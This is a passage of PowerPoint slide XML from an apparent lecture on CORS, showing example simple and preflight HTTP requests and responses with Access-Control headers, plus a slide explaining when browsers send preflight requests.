              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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www.google.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="73152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073BC91-288E-42DE-B7E0-1D6D22D8F87C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="3810000"/>
            <a:ext cx="9296400" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://amazon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 238</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// JavaScript code in response body here…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184AB66E-94D6-4C71-BE5A-24C29C25514D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3011269"/>
            <a:ext cx="6097888" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simple CORS Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821F60DA-F762-4882-8D05-2729C6DB46A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3657600"/>
            <a:ext cx="7315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530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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preflighting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24707555-D2DE-47A6-A6E5-C76342C3AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="990600"/>
            <a:ext cx="8534400" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Some more complicated CORS requests require the browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Send a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>preflight request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> to see if the server can use CORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Send the full request after receiving the preflight response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Preflight requests are sent in the following circumstances:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Request uses an HTTP method other than GET or POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Requests uses custom headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Request body contains non-text data (e.g., binary data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Request are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> to prevent browsers from firing requests for resources they don’t have the credentials to load from the target server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400279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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="6156622" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preflight CORS Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="1143000"/>
            <a:ext cx="11125200" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/analytics.js HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://amazon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: X-Custom-Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="73152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073BC91-288E-42DE-B7E0-1D6D22D8F87C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="3810000"/>
            <a:ext cx="9296400" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://amazon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: GET, POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: X-Custom-Header </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 238</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="020703090202050204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184AB66E-94D6-4C71-BE5A-24C29C25514D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3011269"/>
            <a:ext cx="6541343" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preflight CORS Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821F60DA-F762-4882-8D05-2729C6DB46A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3657600"/>
            <a:ext cx="7315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345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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3766091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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2667000"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
